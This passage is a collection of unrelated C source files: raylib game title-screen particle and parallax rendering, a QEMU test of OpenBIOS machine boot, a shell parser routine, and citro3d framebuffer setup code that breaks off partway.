4*TIME_FACTOR; backPlanetreeParticle.particle[i].position.x -= 3*TIME_FACTOR; 
backPlanetreeParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (backPlanetreeParticle.particle[i].position.y >= GetScreenHeight()) backPlanetreeParticle.particle[i].active = false; } if (dandelionParticle.particle[i].active) { dandelionParticle.particle[i].position.y += 2.5*TIME_FACTOR; dandelionParticle.particle[i].position.x -= 2*TIME_FACTOR; dandelionParticle.particle[i].rotation = -(30*sin(2*PI/120*globalFrameCounter + dandelionParticle.particle[i].rotPhy) + 30); if (dandelionParticle.particle[i].position.y >= GetScreenHeight()) dandelionParticle.particle[i].active = false; } if (dandelionBackParticle.particle[i].active) { dandelionBackParticle.particle[i].position.y += 2*TIME_FACTOR; dandelionBackParticle.particle[i].position.x -= 3*TIME_FACTOR; dandelionBackParticle.particle[i].rotation = -(30*sin(2*PI/120*globalFrameCounter + dandelionParticle.particle[i].rotPhy) + 30); if (dandelionBackParticle.particle[i].position.y >= GetScreenHeight()) dandelionBackParticle.particle[i].active = false; } if (flowerParticle.particle[i].active) { flowerParticle.particle[i].position.y += 2.5*TIME_FACTOR; flowerParticle.particle[i].position.x -= 2*TIME_FACTOR; flowerParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (flowerParticle.particle[i].position.y >= GetScreenHeight()) flowerParticle.particle[i].active = false; } if (backFlowerParticle.particle[i].active) { backFlowerParticle.particle[i].position.y += 2*TIME_FACTOR; backFlowerParticle.particle[i].position.x -= 3*TIME_FACTOR; backFlowerParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (backFlowerParticle.particle[i].position.y >= GetScreenHeight()) backFlowerParticle.particle[i].active = false; } if (rainParticle.particle[i].active) { rainParticle.particle[i].position.y += 4*TIME_FACTOR; rainParticle.particle[i].position.x -= 5*TIME_FACTOR; //rainParticle.particle[i].rotation += 0.5; if (rainParticle.particle[i].position.y >= GetScreenHeight()) rainParticle.particle[i].active = false; } if (backRainParticle.particle[i].active) { backRainParticle.particle[i].position.y += 3*TIME_FACTOR; backRainParticle.particle[i].position.x -= 3*TIME_FACTOR; //rainParticle.particle[i].rotation += 0.5; if (backRainParticle.particle[i].position.y >= GetScreenHeight()) backRainParticle.particle[i].active = false; } } for (int i = 0; i < 1024; i++) { if (rainStormParticle.particle[i].active) { rainStormParticle.particle[i].position.y += 12*TIME_FACTOR; rainStormParticle.particle[i].position.x -= 15*TIME_FACTOR; //rainParticle.particle[i].rotation += 0.5; if (rainStormParticle.particle[i].position.y >= GetScreenHeight()) rainStormParticle.particle[i].active = false; if (rainStormParticle.active == false)rainStormParticle.particle[i].alpha -= 0.01; } } for (int i = 0; i < 256; i++) { if (snowStormParticle.particle[i].active) { snowStormParticle.particle[i].position.y += 12; snowStormParticle.particle[i].position.x -= 15; snowStormParticle.particle[i].rotation += 0.5; if (snowStormParticle.particle[i].position.y >= GetScreenHeight()) snowStormParticle.particle[i].active = false; } } for (int i = 0; i < 20; i++) { if (rayparticle.particle[i].active) { rayparticle.particle[i].position.x -= 0.5*TIME_FACTOR; if (rayparticle.particle[i].fading) { rayparticle.particle[i].alpha -= 0.01f; if (rayparticle.particle[i].alpha <= 0) { rayparticle.particle[i].alpha = 0; rayparticle.particle[i].delayCounter++; if (rayparticle.particle[i].delayCounter >= 30) { rayparticle.particle[i].active = false; rayparticle.particle[i].delayCounter = 0; rayparticle.particle[i].fading = 
false; } } } else { rayparticle.particle[i].alpha += 0.01f; if (rayparticle.particle[i].alpha >= 0.5f) { rayparticle.particle[i].alpha = 0.5f; rayparticle.particle[i].delayCounter++; if (rayparticle.particle[i].delayCounter >= 30) { rayparticle.particle[i].delayCounter = 0; rayparticle.particle[i].fading = true; } } } } if (backRayparticle.particle[i].active) { backRayparticle.particle[i].position.x -= 0.5; if (backRayparticle.particle[i].fading) { backRayparticle.particle[i].alpha -= 0.01f; if (backRayparticle.particle[i].alpha <= 0) { backRayparticle.particle[i].alpha = 0; backRayparticle.particle[i].delayCounter++; if (backRayparticle.particle[i].delayCounter >= 30) { backRayparticle.particle[i].active = false; backRayparticle.particle[i].delayCounter = 0; backRayparticle.particle[i].fading = false; } } } else { backRayparticle.particle[i].alpha += 0.01f; if (backRayparticle.particle[i].alpha >= 0.5f) { backRayparticle.particle[i].alpha = 0.5f; backRayparticle.particle[i].delayCounter++; if (backRayparticle.particle[i].delayCounter >= 30) { backRayparticle.particle[i].delayCounter = 0; backRayparticle.particle[i].fading = true; } } } } } // Press enter to change to GAMEPLAY screen #if (defined(PLATFORM_ANDROID) || defined(PLATFORM_WEB)) if (((IsGestureDetected(GESTURE_TAP) || (GetGestureDetected() == GESTURE_DOUBLETAP)) && framesCounter >= duration)) { //finishScreen = 1; // OPTIONS finishScreen = 2; // GAMEPLAY } #elif (defined(PLATFORM_DESKTOP) || defined(PLATFORM_WEB)) if ((IsKeyPressed(KEY_ENTER) && framesCounter >= duration)) { //finishScreen = 1; // OPTIONS finishScreen = 2; // GAMEPLAY } #endif } // Title Screen Draw logic void DrawTitleScreen(void) { BeginShaderMode(colorBlend); DrawTexturePro(atlas02, gameplay_background, (Rectangle){0, 0, gameplay_background.width*2, gameplay_background.height*2}, (Vector2){0, 0}, 0, color02); // Draw parallax DrawParallaxBack(); DrawParallaxMiddle(); for (int i = 0; i < MAX_particle; i++) { if (backSnowParticle.particle[i].active) DrawTexturePro(atlas02, particle_icecrystal_bw, (Rectangle){ backSnowParticle.particle[i].position.x, backSnowParticle.particle[i].position.y, particle_icecrystal_bw.width*backSnowParticle.particle[i].size, particle_icecrystal_bw.height*backSnowParticle.particle[i].size }, (Vector2){ particle_icecrystal_bw.width*backSnowParticle.particle[i].size/2, particle_icecrystal_bw.height*backSnowParticle.particle[i].size/2 }, backSnowParticle.particle[i].rotation, Fade((Color){144, 214, 255, 255}, backSnowParticle.particle[i].alpha)); if (backPlanetreeParticle.particle[i].active) DrawTexturePro(atlas02, particle_planetreeleaf_bw, (Rectangle){ backPlanetreeParticle.particle[i].position.x, backPlanetreeParticle.particle[i].position.y, particle_planetreeleaf_bw.width*backPlanetreeParticle.particle[i].size, particle_planetreeleaf_bw.height*backPlanetreeParticle.particle[i].size }, (Vector2){ particle_planetreeleaf_bw.width*backPlanetreeParticle.particle[i].size/2, particle_planetreeleaf_bw.height*backPlanetreeParticle.particle[i].size/2 }, backPlanetreeParticle.particle[i].rotation, Fade((Color){179, 86, 6, 255}, backPlanetreeParticle.particle[i].alpha)); if (dandelionBackParticle.particle[i].active) DrawTexturePro(atlas02, particle_dandelion_bw, (Rectangle){ dandelionBackParticle.particle[i].position.x, dandelionBackParticle.particle[i].position.y, particle_dandelion_bw.width*dandelionBackParticle.particle[i].size, particle_dandelion_bw.height*dandelionBackParticle.particle[i].size }, (Vector2){ 
particle_dandelion_bw.width*dandelionBackParticle.particle[i].size/2, particle_dandelion_bw.height*dandelionBackParticle.particle[i].size/2 }, dandelionBackParticle.particle[i].rotation, Fade((Color){202, 167, 126, 255}, dandelionBackParticle.particle[i].alpha)); if (backFlowerParticle.particle[i].active) DrawTexturePro(atlas02, particle_ecualyptusflower_bw, (Rectangle){ backFlowerParticle.particle[i].position.x, backFlowerParticle.particle[i].position.y, particle_ecualyptusflower_bw.width*backFlowerParticle.particle[i].size, particle_ecualyptusflower_bw.height*backFlowerParticle.particle[i].size }, (Vector2){ particle_ecualyptusflower_bw.width*backFlowerParticle.particle[i].size/2, particle_ecualyptusflower_bw.height*backFlowerParticle.particle[i].size/2 }, backFlowerParticle.particle[i].rotation, Fade((Color){218, 84, 108, 255}, backFlowerParticle.particle[i].alpha)); if (backRainParticle.particle[i].active) DrawTexturePro(atlas02, particle_waterdrop_bw, (Rectangle){ backRainParticle.particle[i].position.x, backRainParticle.particle[i].position.y, particle_waterdrop_bw.width*backRainParticle.particle[i].size, particle_waterdrop_bw.height*backRainParticle.particle[i].size }, (Vector2){ particle_waterdrop_bw.width*backRainParticle.particle[i].size/2, particle_waterdrop_bw.height*backRainParticle.particle[i].size/2 }, backRainParticle.particle[i].rotation, Fade((Color){144, 183, 187, 255}, backRainParticle.particle[i].alpha)); } for (int i = 0; i < 20; i++) { if (backRayparticle.particle[i].active) DrawTexturePro(atlas02, gameplay_back_fx_lightraymid, (Rectangle){ backRayparticle.particle[i].position.x, backRayparticle.particle[i].position.y, gameplay_back_fx_lightraymid.width*backRayparticle.particle[i].size, gameplay_back_fx_lightraymid.height*backRayparticle.particle[i].size }, (Vector2){ gameplay_back_fx_lightraymid.width*backRayparticle.particle[i].size/2, gameplay_back_fx_lightraymid.height*backRayparticle.particle[i].size/2 }, backRayparticle.particle[i].rotation, Fade(GOLD, backRayparticle.particle[i].alpha)); } DrawParallaxFront(); for (int i = 0; i < 5; i++) { DrawTexturePro(atlas02, gameplay_props_tree, (Rectangle){bamboo[i].x, bamboo[i].y, 43, 720}, (Vector2){0, 0}, 0, color03); //DrawRectangleRec(bamboo[i], Fade(LIME, 0.5)); } EndShaderMode(); DrawTextureRec(atlas01, koalaMenu, (Vector2){player.x - player.width, player.y - 40}, WHITE); BeginShaderMode(colorBlend); DrawTexturePro(atlas02, gameplay_back_ground00, (Rectangle){0, 637, gameplay_back_ground00.width*2, gameplay_back_ground00.height*2}, (Vector2){0,0}, 0, color00); EndShaderMode(); DrawTexturePro(atlas01, (Rectangle){title_titletext.x, title_titletext.y, title_titletext.width, 230}, (Rectangle){GetScreenWidth()*0.49F - title_titletext.width/2, currentValue1, title_titletext.width, 235}, (Vector2){0, 0}, 0, WHITE); DrawTexturePro(atlas01, (Rectangle){title_titletext.x, title_titletext.y + 232, title_titletext.width, 116}, (Rectangle){GetScreenWidth()*0.49F - title_titletext.width/2, currentValue2, title_titletext.width, 116}, (Vector2){0, 0}, 0, WHITE); if ((framesCounter/60)%2 && framesCounter >= duration) DrawTextEx(font, pressToPlay, (Vector2){ GetScreenWidth()/2 - fontSize.x/2, GetScreenHeight()/2 + fontSize.y*2 }, font.baseSize, 2, (Color){247, 239, 209, 255}); for (int i = 0; i < MAX_particle; i++) { if (snowParticle.particle[i].active) DrawTexturePro(atlas01, particle_icecrystal, (Rectangle){ snowParticle.particle[i].position.x, snowParticle.particle[i].position.y, 
particle_icecrystal.width*snowParticle.particle[i].size, particle_icecrystal.height*snowParticle.particle[i].size }, (Vector2){ particle_icecrystal.width*snowParticle.particle[i].size/2, particle_icecrystal.height*snowParticle.particle[i].size/2 }, snowParticle.particle[i].rotation, Fade(snowParticle.particle[i].color, snowParticle.particle[i].alpha)); if (planetreeParticle.particle[i].active) DrawTexturePro(atlas01, particle_planetreeleaf, (Rectangle){ planetreeParticle.particle[i].position.x, planetreeParticle.particle[i].position.y, particle_planetreeleaf.width*planetreeParticle.particle[i].size, particle_planetreeleaf.height*planetreeParticle.particle[i].size }, (Vector2){ particle_planetreeleaf.width*planetreeParticle.particle[i].size/2, particle_planetreeleaf.height*planetreeParticle.particle[i].size/2 }, planetreeParticle.particle[i].rotation, Fade(planetreeParticle.particle[i].color, planetreeParticle.particle[i].alpha)); if (dandelionParticle.particle[i].active) DrawTexturePro(atlas01, particle_dandelion, (Rectangle){ dandelionParticle.particle[i].position.x, dandelionParticle.particle[i].position.y, particle_dandelion.width*dandelionParticle.particle[i].size, particle_dandelion.height*dandelionParticle.particle[i].size }, (Vector2){ particle_dandelion.width*dandelionParticle.particle[i].size/2, particle_dandelion.height*dandelionParticle.particle[i].size/2 }, dandelionParticle.particle[i].rotation, Fade(dandelionParticle.particle[i].color, dandelionParticle.particle[i].alpha)); if (flowerParticle.particle[i].active) DrawTexturePro(atlas01, particle_ecualyptusflower, (Rectangle){ flowerParticle.particle[i].position.x, flowerParticle.particle[i].position.y, particle_ecualyptusflower.width*flowerParticle.particle[i].size, particle_ecualyptusflower.height*flowerParticle.particle[i].size }, (Vector2){ particle_ecualyptusflower.width*flowerParticle.particle[i].size/2, particle_ecualyptusflower.height*flowerParticle.particle[i].size/2 }, flowerParticle.particle[i].rotation, Fade(flowerParticle.particle[i].color, flowerParticle.particle[i].alpha)); if (rainParticle.particle[i].active) DrawTexturePro(atlas01, particle_waterdrop, (Rectangle){ rainParticle.particle[i].position.x, rainParticle.particle[i].position.y, particle_waterdrop.width*rainParticle.particle[i].size, particle_waterdrop.height*rainParticle.particle[i].size }, (Vector2){ particle_waterdrop.width*rainParticle.particle[i].size/2, particle_waterdrop.height*rainParticle.particle[i].size/2 }, rainParticle.particle[i].rotation, Fade(rainParticle.particle[i].color, rainParticle.particle[i].alpha)); } for (int i = 0; i < 1024; i++) { if (rainStormParticle.particle[i].active) DrawTexturePro(atlas01, particle_waterdrop, (Rectangle){ rainStormParticle.particle[i].position.x, rainStormParticle.particle[i].position.y, particle_waterdrop.width*rainStormParticle.particle[i].size, particle_waterdrop.height*rainStormParticle.particle[i].size }, (Vector2){ particle_waterdrop.width*rainStormParticle.particle[i].size/2, particle_waterdrop.height*rainStormParticle.particle[i].size/2 }, rainStormParticle.particle[i].rotation, Fade(rainStormParticle.particle[i].color, rainStormParticle.particle[i].alpha)); } for (int i = 0; i < 256; i++) { if (snowStormParticle.particle[i].active) DrawTexturePro(atlas01, particle_icecrystal, (Rectangle){ snowStormParticle.particle[i].position.x, snowStormParticle.particle[i].position.y, particle_icecrystal.width*snowStormParticle.particle[i].size, particle_icecrystal.height*snowStormParticle.particle[i].size }, 
(Vector2){ particle_icecrystal.width*snowStormParticle.particle[i].size/2, particle_icecrystal.height*snowStormParticle.particle[i].size/2 }, snowStormParticle.particle[i].rotation, Fade(snowStormParticle.particle[i].color, snowStormParticle.particle[i].alpha)); } for (int i = 0; i < 20; i++) { if (rayparticle.particle[i].active) DrawTexturePro(atlas01, gameplay_fx_lightraymid, (Rectangle){ rayparticle.particle[i].position.x, rayparticle.particle[i].position.y, gameplay_fx_lightraymid.width*rayparticle.particle[i].size, gameplay_fx_lightraymid.height*rayparticle.particle[i].size }, (Vector2){ gameplay_fx_lightraymid.width*rayparticle.particle[i].size/2, gameplay_fx_lightraymid.height*rayparticle.particle[i].size/2 }, rayparticle.particle[i].rotation, Fade(rayparticle.particle[i].color, rayparticle.particle[i].alpha)); } /* DrawTexturePro(atlas01, title_twitter, (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.1, title_twitter.width, title_twitter.height}, (Vector2){0,0}, 0, WHITE); DrawTexturePro(atlas01, title_facebook, (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.3, title_facebook.width, title_facebook.height}, (Vector2){0,0}, 0, WHITE); DrawTexturePro(atlas01, title_googleplay, (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.5, title_googleplay.width, title_googleplay.height}, (Vector2){0,0}, 0, WHITE); if (soundActive)DrawTexturePro(atlas01, title_music_on, (Rectangle){soundButton.x, soundButton.y, title_music_on.width, title_music_on.height}, (Vector2){0,0}, 0, WHITE); else DrawTexturePro(atlas01, title_music_off, (Rectangle){soundButton.x, soundButton.y, title_music_off.width, title_music_off.height}, (Vector2){0,0}, 0, WHITE); if (musicActive)DrawTexturePro(atlas01, title_speaker_on, (Rectangle){speakerButton.x, speakerButton.y, title_speaker_on.width, title_speaker_on.height}, (Vector2){0,0}, 0, WHITE); else DrawTexturePro(atlas01, title_speaker_off, (Rectangle){speakerButton.x, speakerButton.y, title_speaker_off.width, title_speaker_off.height}, (Vector2){0,0}, 0, WHITE); */ } // Title Screen Unload logic void UnloadTitleScreen(void) { // ... } // Title Screen should finish? 
int FinishTitleScreen(void) { return finishScreen; } static void DrawParallaxFront(void) { Rectangle ground01 = gameplay_back_ground01; //DrawTexturePro(atlas02, gameplay_back_tree01_layer03, (Rectangle){0, 21, gameplay_back_tree01_layer03.width*2, gameplay_back_tree01_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree01_layer01, (Rectangle){(int)parallaxFrontOffset, 60, gameplay_back_tree01_layer01.width*2, gameplay_back_tree01_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree02_layer01, (Rectangle){(int)parallaxFrontOffset + 140, 60, gameplay_back_tree02_layer01.width*2, gameplay_back_tree02_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree03_layer01, (Rectangle){(int)parallaxFrontOffset + 140*2, 55, gameplay_back_tree02_layer01.width*2, gameplay_back_tree02_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree04_layer01, (Rectangle){(int)parallaxFrontOffset + 140*3, 60, gameplay_back_tree04_layer01.width*2, gameplay_back_tree04_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree05_layer01, (Rectangle){(int)parallaxFrontOffset + 140*4, 60, gameplay_back_tree05_layer01.width*2, gameplay_back_tree05_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree06_layer01, (Rectangle){(int)parallaxFrontOffset + 140*5, 55, gameplay_back_tree06_layer01.width*2, gameplay_back_tree06_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree07_layer01, (Rectangle){(int)parallaxFrontOffset + 140*6, 60, gameplay_back_tree07_layer01.width*2, gameplay_back_tree07_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree08_layer01, (Rectangle){(int)parallaxFrontOffset + 140*7, 60, gameplay_back_tree08_layer01.width*2, gameplay_back_tree08_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_ground01, (Rectangle){0, 559, ground01.width*2, ground01.height*2}, (Vector2){0,0}, 0, color01); DrawTexturePro(atlas02, (Rectangle){ground01.x, ground01.y + ground01.height, ground01.width, -ground01.height}, (Rectangle){0, -33, ground01.width*2, ground01.height*2}, (Vector2){0,0}, 0, color01); } static void DrawParallaxMiddle(void) { Rectangle ground02 = gameplay_back_ground02; //DrawTexturePro(atlas02, gameplay_back_tree02_layer03, (Rectangle){0, 67, gameplay_back_tree02_layer03.width*2, gameplay_back_tree02_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree01_layer02, (Rectangle){(int)0, 67, gameplay_back_tree01_layer02.width*2, gameplay_back_tree01_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree02_layer02, (Rectangle){(int)140, 67, gameplay_back_tree02_layer02.width*2, gameplay_back_tree02_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree03_layer02, (Rectangle){(int)140*2, 67, gameplay_back_tree03_layer02.width*2, gameplay_back_tree03_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree04_layer02, (Rectangle){(int)140*3, 67, gameplay_back_tree04_layer02.width*2, gameplay_back_tree04_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree05_layer02, (Rectangle){(int)140*4, 67, gameplay_back_tree05_layer02.width*2, gameplay_back_tree05_layer02.height*2}, (Vector2){0,0}, 0, color02); 
DrawTexturePro(atlas02, gameplay_back_tree06_layer02, (Rectangle){(int)140*5, 67, gameplay_back_tree06_layer02.width*2, gameplay_back_tree06_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree07_layer02, (Rectangle){(int)140*6, 67, gameplay_back_tree07_layer02.width*2, gameplay_back_tree07_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree08_layer02, (Rectangle){(int)140*7, 67, gameplay_back_tree08_layer02.width*2, gameplay_back_tree08_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_ground02, (Rectangle){0, 509, ground02.width*2, ground02.height*2}, (Vector2){0,0}, 0, color01); DrawTexturePro(atlas02, (Rectangle){ground02.x, ground02.y + ground02.height, ground02.width, -ground02.height}, (Rectangle){0, 19, ground02.width*2, ground02.height*2}, (Vector2){0,0}, 0, color01); } static void DrawParallaxBack(void) { Rectangle ground03 = gameplay_back_ground03; //DrawTexturePro(atlas02, gameplay_back_tree02_layer03, (Rectangle){0, 67, gameplay_back_tree02_layer03.width*2, gameplay_back_tree02_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree01_layer03, (Rectangle){(int)parallaxBackOffset, 67, gameplay_back_tree01_layer03.width*2, gameplay_back_tree01_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree02_layer03, (Rectangle){(int)parallaxBackOffset + 140, 67, gameplay_back_tree02_layer03.width*2, gameplay_back_tree02_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree03_layer03, (Rectangle){(int)parallaxBackOffset + 140*2, 67, gameplay_back_tree03_layer03.width*2, gameplay_back_tree03_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree04_layer03, (Rectangle){(int)parallaxBackOffset + 140*3, 67, gameplay_back_tree04_layer03.width*2, gameplay_back_tree04_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree05_layer03, (Rectangle){(int)parallaxBackOffset + 140*4, 67, gameplay_back_tree05_layer03.width*2, gameplay_back_tree05_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree06_layer03, (Rectangle){(int)parallaxBackOffset + 140*5, 67, gameplay_back_tree06_layer03.width*2, gameplay_back_tree06_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree07_layer03, (Rectangle){(int)parallaxBackOffset + 140*6, 67, gameplay_back_tree07_layer03.width*2, gameplay_back_tree07_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree08_layer03, (Rectangle){(int)parallaxBackOffset + 140*7, 67, gameplay_back_tree08_layer03.width*2, gameplay_back_tree08_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_ground03, (Rectangle){0, 469, ground03.width*2, ground03.height*2}, (Vector2){0,0}, 0, color01); DrawTexturePro(atlas02, (Rectangle){ground03.x, ground03.y + ground03.height, ground03.width, -ground03.height}, (Rectangle){0, 67, ground03.width*2, ground03.height*2}, (Vector2){0,0}, 0, color01); } static float BounceEaseOut(float t,float b , float c, float d) { if ((t/=d) < (1/2.75f)) { return c*(7.5625f*t*t) + b; } else if (t < (2/2.75f)) { float postFix = t-=(1.5f/2.75f); return c*(7.5625f*(postFix)*t + .75f) + b; } else if (t < (2.5/2.75)) { float postFix = t-=(2.25f/2.75f); return c*(7.5625f*(postFix)*t + .9375f) + b; } else { float postFix = t-=(2.625f/2.75f); return 
c*(7.5625f*(postFix)*t + .984375f) + b; } }
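/*
 * Editor's note: a minimal sketch (not part of the original game source)
 * showing how the Penner-style BounceEaseOut() above is meant to be called:
 * t is the elapsed time, b the starting value, c the total change, and d
 * the duration. It returns b at t == 0 and exactly b + c at t == d,
 * bouncing between the piecewise segments in between. DemoBounceEaseOut()
 * is a hypothetical helper added only for illustration.
 */
#if 0   /* illustration only -- not compiled with the game */
#include <stdio.h>

static void DemoBounceEaseOut(void)
{
    float startY = 0.0f;        /* b: initial position           */
    float deltaY = 100.0f;      /* c: total change over the run  */
    float duration = 1.0f;      /* d: animation length (seconds) */

    for (int step = 0; step <= 10; step++)
    {
        float t = duration*step/10.0f;
        printf("t=%.1f  y=%.2f\n", t, BounceEaseOut(t, startY, deltaY, duration));
    }
}
#endif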
54572.c
/*
 * Test OpenBIOS-based machines.
 *
 * Copyright (c) 2016 Red Hat Inc.
 *
 * Author:
 *    Thomas Huth <thuth@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2
 * or later. See the COPYING file in the top-level directory.
 *
 * This test is used to check that some Open Firmware based machines (i.e.
 * OpenBIOS or SLOF) can be started successfully in TCG mode. To do this, we
 * first put some Forth code into the "boot-command" Open Firmware environment
 * variable. This Forth code writes a well-known magic value to a known location
 * in memory. Then we start the guest so that the firmware can boot and finally
 * run the Forth code.
 * The testing code here can then check whether the value has been
 * successfully written into the guest memory.
 */

#include "qemu/osdep.h"
#include "libqtest.h"

#define MAGIC   0xcafec0de
#define ADDRESS 0x4000

static void check_guest_memory(void)
{
    uint32_t signature;
    int i;

    /* Poll until code has run and modified memory. Wait at most 100 seconds
     * (10000 polls, 10 ms apart). */
    for (i = 0; i < 10000; ++i) {
        signature = readl(ADDRESS);
        if (signature == MAGIC) {
            break;
        }
        g_usleep(10000);
    }

    g_assert_cmphex(signature, ==, MAGIC);
}

static void test_machine(const void *machine)
{
    char *args;

    args = g_strdup_printf("-M %s,accel=tcg -prom-env 'boot-command=%x %x l!'",
                           (const char *)machine, MAGIC, ADDRESS);

    qtest_start(args);
    check_guest_memory();
    qtest_quit(global_qtest);

    g_free(args);
}

static void add_tests(const char *machines[])
{
    int i;
    char *name;

    for (i = 0; machines[i] != NULL; i++) {
        name = g_strdup_printf("prom-env/%s", machines[i]);
        qtest_add_data_func(name, machines[i], test_machine);
        g_free(name);
    }
}

int main(int argc, char *argv[])
{
    const char *sparc_machines[] = { "SPARCbook", "Voyager", "SS-20", NULL };
    const char *sparc64_machines[] = { "sun4u", "sun4v", NULL };
    const char *ppc_machines[] = { "mac99", "g3beige", NULL };
    const char *ppc64_machines[] = { "mac99", "g3beige", "pseries", NULL };
    const char *arch = qtest_get_arch();

    g_test_init(&argc, &argv, NULL);

    if (!strcmp(arch, "ppc")) {
        add_tests(ppc_machines);
    } else if (!strcmp(arch, "ppc64")) {
        add_tests(ppc64_machines);
    } else if (!strcmp(arch, "sparc")) {
        add_tests(sparc_machines);
    } else if (!strcmp(arch, "sparc64")) {
        add_tests(sparc64_machines);
    } else {
        g_assert_not_reached();
    }

    return g_test_run();
}
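/*
 * Editor's note: a minimal sketch (not part of the QEMU test) showing the
 * Forth "boot-command" string that test_machine() constructs. In Open
 * Firmware Forth, "value addr l!" stores the 32-bit value at addr, so the
 * firmware itself writes the magic number that check_guest_memory() polls
 * for from the host side.
 */
#if 0   /* illustration only -- compile stand-alone */
#include <stdio.h>

int main(void)
{
    /* Mirrors the g_strdup_printf() call in test_machine() for "mac99": */
    printf("-M %s,accel=tcg -prom-env 'boot-command=%x %x l!'\n",
           "mac99", 0xcafec0de, 0x4000);
    /* Prints: -M mac99,accel=tcg -prom-env 'boot-command=cafec0de 4000 l!' */
    return 0;
}
#endif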
819938.c
#include "parser.h" /* ** Unstack processus from the stack of tokens. */ static int s_build_command_string(t_proc *p, t_lexer *lexer, int i) { char *tmp; if ((p->command = ft_strnew(0)) == NULL) return (ST_MALLOC); while (i < lexer->size && TOKEN_TYPE(i) == TT_SEPARATOR) i++; while (i < lexer->size) { while (i + 1 < lexer->size && TOKEN_TYPE(i) == TT_SEPARATOR && TOKEN_TYPE(i + 1) == TT_SEPARATOR) i++; if (i >= lexer->size) break ; if (TOKEN_CODE(i) != TC_AND) { tmp = p->command; if ((p->command = ft_strjoin(p->command, TOKEN_CONTENT(i))) == NULL) return (ST_MALLOC); free(tmp); } if (i < lexer->size && TOKEN_CODE(i) == TC_PIPE) break ; i++; } return (ST_OK); } static int s_process_tokens(t_parser *parser, t_lexer *lexer, t_proc *p, int *i) { int ret; while (*i < lexer->size && !(TOKEN_TYPE(*i) == TT_REDIR && TOKEN_CODE(*i) == TC_PIPE)) { ret = lexer->tokens[*i]->parse((void *)p, parser, lexer, i); if (ret != ST_OK) { proc_free(&p); return (ret); } } if (*i < lexer->size) { ret = lexer->tokens[*i]->parse((void *)p, parser, lexer, i); if (ret != ST_OK) { proc_free(&p); return (ret); } } return (ST_OK); } int parser_build_list_unstack_lexer_proc(t_parser *parser, t_lexer *lexer, int *i) { int ret; t_proc *p; t_job *j; j = CONTAINER_OF(parser->target_list_head, t_job, proc_head); while (*i < lexer->size) { if (!(p = proc_alloc(parser->sh, j))) return (ST_MALLOC); if ((ret = s_build_command_string(p, lexer, *i)) != ST_OK) return (ret); if ((ret = s_process_tokens(parser, lexer, p, i)) != ST_OK) return (ret); list_push_back(&p->list_proc, parser->target_list_head); } return (ST_OK); }
523502.c
#include "internal.h" static const u8 colorFmtSizes[] = {2,1,0,0,0}; static const u8 depthFmtSizes[] = {0,0,1,2}; u32 C3D_CalcColorBufSize(u32 width, u32 height, GPU_COLORBUF fmt) { u32 size = width*height; return size*(2+colorFmtSizes[fmt]); } u32 C3D_CalcDepthBufSize(u32 width, u32 height, GPU_DEPTHBUF fmt) { u32 size = width*height; return size*(2+depthFmtSizes[fmt]); } C3D_FrameBuf* C3D_GetFrameBuf(void) { C3D_Context* ctx = C3Di_GetContext(); if (!(ctx->flags & C3DiF_Active)) return NULL; ctx->flags |= C3DiF_FrameBuf; return &ctx->fb; } void C3D_SetFrameBuf(C3D_FrameBuf* fb) { C3D_Context* ctx = C3Di_GetContext(); if (!(ctx->flags & C3DiF_Active)) return; if (fb != &ctx->fb) memcpy(&ctx->fb, fb, sizeof(*fb)); ctx->flags |= C3DiF_FrameBuf; } void C3D_FrameBufTex(C3D_FrameBuf* fb, C3D_Tex* tex, GPU_TEXFACE face, int level) { C3D_FrameBufAttrib(fb, tex->width, tex->height, false); C3D_FrameBufColor(fb, C3D_TexGetImagePtr(tex, C3Di_TexIs2D(tex) ? tex->data : tex->cube->data[face], level, NULL), (GPU_COLORBUF)tex->fmt); } void C3Di_FrameBufBind(C3D_FrameBuf* fb) { u32 param[4] = { 0, 0, 0, 0 }; 